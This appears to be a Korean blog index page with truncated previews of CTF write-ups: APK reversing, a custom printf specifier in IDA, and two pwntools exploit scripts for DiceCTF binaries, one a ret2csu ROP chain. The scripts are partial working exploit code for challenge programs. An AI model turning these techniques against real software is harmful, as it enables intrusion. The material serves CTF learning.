app-release.apk 라는 apk를 줌 apk 리버싱을 안해봤다 https://balsn.tw/ctf_writeup/20210717-googlectf2021/#adspam Google CTF 2021 Quals Google CTF 2021 Quals Reverse cpp The file cpp.c is a c source code file with lots of macro, the goal is to define the macro FLAG_0 ~ FLAG_20 with correct characters to pass the flag check. The logic of flag checker and the execution flow are implemented b balsn.tw https://ar..

얼마 못 본 문제 main 함수에서 처음 보는 서식 지정자를 쓴다 ida freeware register_printf_function으로 서식 지정자를 선언해줄 수 있다고 한다 T에 들어가는 sub_225A를 보면 __int64 __fastcall sub_225A(FILE *stream, const struct printf_info *info, const void *const *args) { return (unsigned int)fprintf(stream, "%d%s", ***(unsigned int ***)args, *(const char **)(**(_QWORD **)args + 8LL)); } 요래 되어있어서 입력을 London을 주면 if ( !strcmp("London", s2) ) { v10 ..

# exploit.py from pwn import * #context.log_level = 'debug' p = process("./fl") lib = ELF("./libc-2.27.so") #p = remote("dicec.tf", 31904) def Mal(idx, data): p.sendlineafter(":", b'1') p.sendlineafter(":", str(idx)) p.sendlineafter(":", data) def Flip(): p.sendlineafter(":", b'2') p.sendlineafter(":", b'3') Mal(1, p64(0x404020)) Flip() payload = p64(0x404040) payload += p64(0x404120)*3 payload ..

# exploit.py from pwn import * #context.log_level = 'debug' p = process("./babyrop") #p = remote("dicec.tf", 31924) e = ELF("./babyrop") setcsu = 0x4011ca csu = 0x4011b0 def chaining(func, p1, p2, p3): ret = p64(0) ret += p64(1) ret += p64(p1) ret += p64(p2) ret += p64(p3) ret += p64(func) ret += p64(csu) ret += p64(0) return ret payload = b'A'*0x48 payload += p64(setcsu) payload += chaining(e.g..